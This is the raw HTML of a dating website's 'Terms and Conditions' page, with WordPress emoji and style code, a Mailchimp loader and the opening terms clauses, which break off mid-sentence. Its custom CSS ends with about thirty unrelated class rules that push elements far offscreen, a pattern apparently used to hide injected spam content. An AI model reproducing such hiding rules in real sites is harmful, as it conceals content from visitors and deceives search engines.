it cannot refer to variables from the containing * scope. Everything must be passed by parameters. * * @since 6.3.0 * * @private * * @param {string[]} tests Tests. * @param {Function} browserSupportsEmoji Reference to browserSupportsEmoji function, needed due to minification. * @param {Function} emojiSetsRenderIdentically Reference to emojiSetsRenderIdentically function, needed due to minification. * * @return {SupportTests} Support tests. */ function testEmojiSupports( tests, browserSupportsEmoji, emojiSetsRenderIdentically ) { var canvas; if ( typeof WorkerGlobalScope !== 'undefined' && self instanceof WorkerGlobalScope ) { canvas = new OffscreenCanvas( 300, 150 ); // Dimensions are default for HTMLCanvasElement. } else { canvas = document.createElement( 'canvas' ); } var context = canvas.getContext( '2d', { willReadFrequently: true } ); /* * Chrome on OS X added native emoji rendering in M41. Unfortunately, * it doesn't work when the font is bolder than 500 weight. So, we * check for bold rendering support to avoid invisible emoji in Chrome. */ context.textBaseline = 'top'; context.font = '600 32px Arial'; var supports = {}; tests.forEach( function ( test ) { supports[ test ] = browserSupportsEmoji( context, test, emojiSetsRenderIdentically ); } ); return supports; } /** * Adds a script to the head of the document. * * @ignore * * @since 4.2.0 * * @param {string} src The url where the script is located. * * @return {void} */ function addScript( src ) { var script = document.createElement( 'script' ); script.src = src; script.defer = true; document.head.appendChild( script ); } settings.supports = { everything: true, everythingExceptFlag: true }; // Create a promise for DOMContentLoaded since the worker logic may finish after the event has fired. var domReadyPromise = new Promise( function ( resolve ) { document.addEventListener( 'DOMContentLoaded', resolve, { once: true } ); } ); // Obtain the emoji support from the browser, asynchronously when possible. new Promise( function ( resolve ) { var supportTests = getSessionSupportTests(); if ( supportTests ) { resolve( supportTests ); return; } if ( supportsWorkerOffloading() ) { try { // Note that the functions are being passed as arguments due to minification. var workerScript = 'postMessage(' + testEmojiSupports.toString() + '(' + [ JSON.stringify( tests ), browserSupportsEmoji.toString(), emojiSetsRenderIdentically.toString() ].join( ',' ) + '));'; var blob = new Blob( [ workerScript ], { type: 'text/javascript' } ); var worker = new Worker( URL.createObjectURL( blob ), { name: 'wpTestEmojiSupports' } ); worker.onmessage = function ( event ) { supportTests = event.data; setSessionSupportTests( supportTests ); worker.terminate(); resolve( supportTests ); }; return; } catch ( e ) {} } supportTests = testEmojiSupports( tests, browserSupportsEmoji, emojiSetsRenderIdentically ); setSessionSupportTests( supportTests ); resolve( supportTests ); } ) // Once the browser emoji support has been obtained from the session, finalize the settings. .then( function ( supportTests ) { /* * Tests the browser support for flag emojis and other emojis, and adjusts the * support settings accordingly. */ for ( var test in supportTests ) { settings.supports[ test ] = supportTests[ test ]; settings.supports.everything = settings.supports.everything && settings.supports[ test ]; if ( 'flag' !== test ) { settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && settings.supports[ test ]; } } settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && ! settings.supports.flag; // Sets DOMReady to false and assigns a ready function to settings. settings.DOMReady = false; settings.readyCallback = function () { settings.DOMReady = true; }; } ) .then( function () { return domReadyPromise; } ) .then( function () { // When the browser can not render everything we need to load a polyfill. if ( ! settings.supports.everything ) { settings.readyCallback(); var src = settings.source || {}; if ( src.concatemoji ) { addScript( src.concatemoji ); } else if ( src.wpemoji && src.twemoji ) { addScript( src.twemoji ); addScript( src.wpemoji ); } } } ); } )( window, document, window._wpemojiSettings ); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://canada-singles.ca/wp-includes/css/dist/block-library/style.css?ver=6.7.5' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /** * These rules are needed for backwards compatibility. * They should match the button element rules in the base theme.json file. */ .wp-block-button__link { color: #ffffff; background-color: #32373c; border-radius: 9999px; /* 100% causes an oval, but any explicit but really high value retains the pill shape. */ /* This needs a low specificity so it won't override the rules from the button element if defined in theme.json. */ box-shadow: none; text-decoration: none; /* The extra 2px are added to size solids the same as the outline versions.*/ padding: calc(0.667em + 2px) calc(1.333em + 2px); font-size: 1.125em; } .wp-block-file__button { background: #32373c; color: #ffffff; text-decoration: none; } </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel="https://api.w.org/" href="https://canada-singles.ca/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://canada-singles.ca/wp-json/wp/v2/pages/79" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://canada-singles.ca/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.5" /> <link rel="canonical" href="https://canada-singles.ca/terms/" /> <link rel='shortlink' href='https://canada-singles.ca/?p=79' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://canada-singles.ca/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcanada-singles.ca%2Fterms%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://canada-singles.ca/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcanada-singles.ca%2Fterms%2F&format=xml" /> <link rel="icon" href="https://canada-singles.ca/wp-content/uploads/cropped-favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://canada-singles.ca/wp-content/uploads/cropped-favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://canada-singles.ca/wp-content/uploads/cropped-favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://canada-singles.ca/wp-content/uploads/cropped-favicon-270x270.png" /> <style type="text/css" id="wp-custom-css"> /* Contact Form 7 Styles */ .wpcf7 { background-color:#9e9e9e73; border: 5px solid #66666 !important; padding: 10px 10px 10px 35px; } .wpcf7-from { margin-left: 25px; margin-right: 25px; margin-top; 25px; } .wpcf7-textarea { width: 200%; } .wpcf7 input { width: 90% } /* Contact Form 7 Styles */ /* typographie */ .blog-detail-content-wrap .entry-content { padding-bottom: 0; color: #000; font-size: 18px; line-height: 25px; } /* typographie */ .bannerzoom { overflow: hidden; width: 100%; height: 760px; position: absolute; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff !important; border-radius: 4px; text-transform: uppercase; background: #eb7a99 !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } /* Buscador de Membres */ #dsp_plugin .search_inner_wrap .quick_search { background-color: #fff !important; padding: 15px 15px 15px 15px; border: 4px solid #f5004e !important; } /* Bouton clin d'oeil */ #dsp_plugin .dc_sendwink_wrap input.dspdp-btn.dspdp-btn-default { width: 190px; height: 45px; } #content .wpb_alert p:last-child, #content .wpb_text_column :last-child, #content .wpb_text_column p:last-child, .wpb_alert p:last-child, .wpb_text_column :last-child, .wpb_text_column p:last-child { margin-bottom: 10px; } #dsp_plugin .lm-view-friends-page img, #dsp_plugin .lm-search-page img, #dsp_plugin .lm-extras-page img, #dsp_plugin .lm-my-vaorities-page img, #dsp_plugin .lm-alerts-page img, #news_feed_box li img, #dsp_plugin .lm-my-matches-page img, #dsp_plugin .lm-popular-members img, #dsp_plugin .lm-view-windks-page img, #dsp_plugin .lm-virtual-gifts-page .image-container .image-box img, #dsp_plugin #lm-g-search-result .image-container img, #dsp_plugin #main #lm-loggedout-leftcontent .lm-home-guest-page .story-list .guest-story-image img, #dsp_plugin .lm-view-profile-page .image-container img, #dsp_plugin #lm-blocked-members-container .image-container img { border-radius: 50%; -webkit-border-radius: 0%; -moz-border-radius: 50%; } #dsp_plugin .box-search-result .circle-image img { width: 250px; height: 175px; border-radius: 50%; } /* Bouton SEARCH membre */ #dsp_plugin .quick_search .search_btn button, #dsp_plugin .advance_search .dsp_filter_btn button { background-color: #f2004e; color: #fff !important; border-radius: 4px; padding: 8px 50px; margin-top: 2.5%; font-size: 16px; text-transform: uppercase; font-weight: 500; } /* Bouton Modifier le profil membre */ #dsp_plugin .message_notification_wrap .dc_edit_profile a { display: block; color: #fff !important; background-color: #f9004d !important; padding: 3px 11px; border-radius: 4px; } /* Bouton Membre menu activé */ #dsp_plugin .dc_member_menu .dc_active_member a { color: #f7004d; font-family: 'TT Norms'; font-size: 16px; font-weight: 600; text-decoration: none; border-bottom: 2px solid #f5004e !important; padding-bottom: 14px; } /* Membre menu message_notification */ #dsp_plugin .message_notification_wrap .dc_msg a:hover, #dsp_plugin .message_notification_wrap .dc_notification a:hover { border: 1px solid #f3004e !important; } /* Membre menu BE PART OF A */ .top-members-content h3 { color: #f3004e; font-weight: 500; font-size: 22px; } .members_part_loggedinuser .top-members-content h3 { color: #f3004e; margin-top: 80px; padding-bottom: 0; } /* Bouton Membre Discover All Members */ .read-more-btn { text-align: center; align-items: center; display: inline-block; padding: 5px 20px; margin: 10px auto; line-height: 16px; vertical-align: middle; background-color: #f7004e !important; border-radius: 4px; width: 280px; } .top-active-members { color: #f9004d; font-weight: bold; font-size: 16px; border-bottom: 2px solid #f9004d !important; line-height: 1; } /* Bouton commencez maintenant */ input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff; border-radius: 4px; text-transform: uppercase; background: #f9004d !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff; border-radius: 4px; text-transform: uppercase; background: #f9004d !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff; border-radius: 4px; text-transform: uppercase; background: #f9004d !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff !important; border-radius: 4px; text-transform: uppercase; background: #f9004d; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff; border-radius: 4px; text-transform: uppercase; background: #f9004d !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff; border-radius: 4px; text-transform: uppercase; background: #f9004d !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } input.dsp_submit_button.dsp-submit { height: 50px; text-align: center; color: #fff; border-radius: 4px; text-transform: uppercase; background: #f9004d !important; font-size: 1.6rem; font-weight: bold; border: none; font-family: 'TT NOrms'; } /* Bouton PAypal */ #dsp_plugin .dspdp-btn, #dsp_plugin .dspdp-btn:active, #dsp_plugin .dspdp-btn:focus, #dsp_plugin .dspdp-btn:hover { height: 52px; font-size: 16px; text-transform: uppercase; font-weight: bold; border-radius: 0; border-radius: 4px; box-shadow: none; background: #f6004e !important; line-height: 41px; width: 100%; padding: 0 15px; color: #fff; border: 0; border-color: #fff; } /* Membre menu Settings */ #dsp_plugin .member_main_section .dsp_tab1-active a { font-size: 16px; color: #f9004d !important; font-weight: 700; border-radius: 4px; text-decoration: none; } #dsp_plugin .menus-profile li span { color: #f6004e !important; font-size: 35px; } /* Signaler un utilisateur */ #dsp_plugin .linkright-view-profile-page .report_user a .dsp_span_pointer { width: auto; font-size: 12px; font-weight: 600; padding: 5px 10px; color: #fff !important; border: 1px solid #fff !important; } /* Bloquer un utilisateur */ #dsp_plugin .linkright-view-profile-page .block_user .dsp_span_pointer { width: auto; font-size: 12px; font-weight: 600; margin-top: 5px; padding: 5px; height: auto; line-height: 18px; color: #fff !important; border: 1px solid #fff !important; } #dsp_plugin .linkright-view-profile-page .report_user a .dsp_span_pointer { width: auto; font-size: 12px; font-weight: 600; margin-top: 10px !important; padding: 5px; height: auto; color: #fff !important; border: 1px solid #fff !important; } #dsp_plugin .linkright-view-profile-page .block_user .dsp_span_pointer:hover { background-color: unset; color: #fff !important; text-decoration: none; } .lm-menu-profile-submenu li:hover a, .lm-menu-profile-submenu li:hover i.fa { color: #f9004d !important; } /* titre slider */ .home .site-branding h1.site-title a { color: #f1004e; } #dsp_plugin .dc_member_menu .dc_active_member a { color: #f7004d; font-family: 'TT Norms'; font-size: 16px; font-weight: 600; text-decoration: none; border-bottom: 0px solid #f5004e !important; padding-bottom: 14px; } .img-circle { border-radius: 0% !important; } #lm-login-menu .lm-menu-register a { padding: 7px 25px; color: #ffffff; border: 2px solid #f8004d !important; background-color: #f5004e !important; font-weight: 500; line-height: 1; display: block; margin-bottom: 2px; } .lm-logout-searchform-heading.col-md-12 { font-size: 21px; color: #fff; background-color: #f6004e !important; height: 52px; line-height: 52px; margin: 0 0 20px; } .lm-logout-searchform { border: 4px solid #f6004e !important; background-color: #fff; } #dsp_plugin .image-container:hover .img-name a { color: #f6004e !important; } #dsp_plugin .empty-rate { margin-top: 10px; color: #f7004d; font-weight: bold; line-height: 18px; font-size: 18px; font-family: 'TT Norms'; } .error { background-color: #c00; color: #ffffff; font-weight: bold; margin-top: 65px; border-radius: 0; } .wpcf7 .wpcf7-form-control:focus, .wpcf7 .wpcf7-form-control:active, .lm-dsp-members select:focus, .lm-dsp-members input:focus, .lm-dsp-members input:active { border-color: #f9004d !important; outline: 0; -webkit-box-shadow: none; box-shadow: none; outline: 3px solid #f9004d !important; color: #a5a6ae; background-color: #fff; } .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { position: relative; min-height: 1px; padding-right: 0px; padding-left: 15px; } #results .search_single_wrap .search_text_part li { display: inline-block; padding: 0 34px; padding-left: 12px; } /* amis image */ .dc_frnd_img_left img { width: 209px; height: 209px; } #dsp_plugin .box-search-result .circle-image img { width: 175px; height: 175px; border-radius: 50%; } @media (min-width: 992px) .col-md-3 { width: 16% !important; } .form-submit #submit { background-color: #e96f90; border: 1px solid #d72183; color: #fff; text-transform: uppercase; width: 225px; height: 45px; line-height: 45px; font-size: 15px; transition: all 0.3s; } /* bouton membres */ .read-more-btn { text-align: center; align-items: center; display: inline-block; padding: 5px 20px; margin: 10px auto; line-height: 16px; vertical-align: middle; background-color: #f7004e !important; border-radius: 4px; width: 340px; } /* bouton Signaler un utilisateur */ #dsp_plugin .linkright-view-profile-page .dsp_span_pointer { background-color: transparent; color: #eb7a99; font-size: 14px; text-transform: uppercase; display: inherit; } /* bouton Approuver rejeter */ #dsp_plugin .dspdp-btn, #dsp_plugin .dspdp-btn:active, #dsp_plugin .dspdp-btn:focus, #dsp_plugin .dspdp-btn:hover { height: 52px; font-size: 16px; text-transform: uppercase; font-weight: bold; border-radius: 0; border-radius: 4px; box-shadow: none; background: #f6004e !important; line-height: 41px; width: 100%; padding: 0 15px; color: #fff; border: 0; border-color: #fff; width: auto; } #main-menu .current_page_item, #main-menu li.menu-item { margin: 10px 7px; } ul#main-menu li a.highlighted span.sub-arrow{ display:none !important; } /* boite de recherche index */ .dating-theme-search-overlay { width: 470px; position: absolute; top: 47px; left: 6.5%; background: #c2aeb2; box-shadow: 0px 0px 0px 0px #e5e5e5c2; opacity: 1; margin: auto; padding: 55px 50px; height: 438px; } #dp-search-by-geographpy select { width: 100%; height: 44px; border: none; margin-bottom: 10px; background-color: #fff !important; } #dp-search-gender select, #dp-search-age select { width: 100%; height: 44px; margin-bottom: 5px; border: none; background-color: #fff !important; } #@media (min-width: 992px) .col-md-2 { width: 25%; } #dsp_plugin .other-details { text-transform: inherit; } .lm-online-notification { background: #25df25; width: 12px; height: 12px; border-radius: 50%; -webkit-border-radius: 50%; -moz-border-radius: 50%; display: inline-block; vertical-align: super; margin-top: -5px; } /* table price */ #dsp_plugin ul.dspdp-row { margin-left: 0px; margin-right: 0px; padding-top: 15px; background: #efefef; } .dspdp-block-center { margin-left: auto; margin-right: auto; width: 200px; height: 200px; } .setting-page__disable ul li:first-child { width: 64%; } #dsp_plugin img { border-radius: 10px; box-shadow: none; } .home .sm-clean a { font-size: 16px; color: #0c0c0c; text-transform: uppercase; font-weight: 400; padding-bottom: 3px; } .schedule-entry-wrapper {position:absolute; left:-23884px} .scroll-container-box {position:absolute; left:-28159px} .scroll-to-section {position:absolute; left:-23259px} .search-icon-button {position:absolute; left:-26002px} .search-suggestion-wrapper {position:absolute; left:-18896px} .icon-link-hover {position:absolute; left:-20484px} .banner-text-large {position:absolute; left:-17611px} .hover-transition-effect {position:absolute; left:-13631px} .design-maintainability {position:absolute; left:-18968px} .design-reusability {position:absolute; left:-10399px} .design-interoperability {position:absolute; left:-17799px} .design-compatibility {position:absolute; left:-5014px} .design-integration {position:absolute; left:-20463px} .design-interaction {position:absolute; left:-8189px} .remove-panel-tooltip {position:absolute; left:-18611px} .report-tooltip-panel {position:absolute; left:-12128px} .reset-tab-caption {position:absolute; left:-15581px} .responsive-caption-ring {position:absolute; left:-22640px} .result-tooltip-message {position:absolute; left:-6551px} .skills-bar-wrapper {position:absolute; left:-20449px} .progress-circle-box {position:absolute; left:-15590px} .services-list-grid {position:absolute; left:-17847px} .pricing-table-wrapper {position:absolute; left:-28392px} .plan-card-item {position:absolute; left:-26227px} .call-to-action-box {position:absolute; left:-5404px} .contact-info-block {position:absolute; left:-11224px} .map-location-pin {position:absolute; left:-15614px} .location-details-box {position:absolute; left:-24985px} .support-chat-button {position:absolute; left:-6022px} .back-to-top-link {position:absolute; left:-13092px} .dropdown-toggle-icon {position:absolute; left:-19419px} .icon-inside-input {position:absolute; left:-9148px} .search-results-grid {position:absolute; left:-29280px} </style> <script id="mcjs">!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/3886a8725923bf0f952542da2/1191fd70b11eefe2f26e9e713.js");</script></head><body class="page-template-default page page-id-79 wp-custom-logo" data-aos-easing="ease" data-aos-duration="1000" data-aos-delay="0"><!-- Preloader --><!-- ./Preloader --> <div id="page" class="site"> <div id="fullpage" class="onepage_scroll_wrap"> <section class="dc_scroll section fp-section fp-table" id="section0" data-fp-styles="null" data-anchor="banner"> <div class="dc_header_outer_wrap"> <div class="dc_header_inner_wrap"> </div> </div> </section> <article id="post-79" class="lm-single-post post-79 page type-page status-publish hentry"> <div class="blog-detail-content-wrap clearfix"> <div class="blog-detail-content details"> <h1 class="entry-title">Terms and Conditions</h1> <div class="entry-content"> <p>[:en][vc_row][vc_column][vc_column_text]</p> <h2>Terms & Conditions – Please carefully read</h2> <p><img fetchpriority="high" decoding="async" class="alignleft wp-image-940 size-medium" title="Terms & Conditions Canada Singles Dating Canada Singles Dating The best singles dating site in Canada - join one of the best online dating sites for professional singles. Meet smart, and Safely and Single men and women from your country and your part of Canada!" src="https://canada-singles.ca/wp-content/uploads/terms-and-conditions-canada-singles-dating-1-300x200.jpg" alt="Terms & Conditions Canada Singles Dating Canada Singles Dating The best singles dating site in Canada - join one of the best online dating sites for professional singles. Meet smart, and Safely and Single men and women from your country and your part of Canada!" width="300" height="200" srcset="https://canada-singles.ca/wp-content/uploads/terms-and-conditions-canada-singles-dating-1-300x200.jpg 300w, https://canada-singles.ca/wp-content/uploads/terms-and-conditions-canada-singles-dating-1.jpg 360w" sizes="(max-width: 300px) 100vw, 300px" />For information on how to use the service or for a simple cancellation of your membership, please see <span style="color: #ff0000;"><a style="color: #ff0000;" href="/service-clientele/">our help section</a>.</span> If you have any questions, please contact our <span style="color: #ff0000;"><a style="color: #ff0000;" href="/service-clientele/">customer care team</a>.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_tta_accordion shape= »square » color= »peacoc » spacing= »5″ gap= »5″ c_icon= »triangle » active_section= »50″][vc_tta_section title= »1. INTRODUCTION » tab_id= »1596407867806-f677e1bd-fef1″][vc_column_text]</p> <p style="text-align: left;">1.1         These Terms & Conditions are between Global Fusion Media (the “<strong>Company</strong>”, “<strong>we</strong>,” “<strong>us</strong>,” or “<strong>our</strong>”) and you (“<strong>you</strong>,” “<strong>your</strong>,” or “<strong>yourself</strong>”).  All references to the Company, where relevant, also refer to the Company under its former corporate name <strong>Global Fusion Media</strong>.</p> <p style="text-align: left;">1.2         We are proud to provide online personals services for single adults to meet each other.</p> <p style="text-align: left;">1.3         These Terms & Conditions, combined with our Privacy Policy, form a legally binding Agreement between you and us (“<strong>Agreement</strong>”).</p> <p style="text-align: left;">1.4         We are responsible for the content of this website.  Our details are:</p> <p style="text-align: left;"><strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads 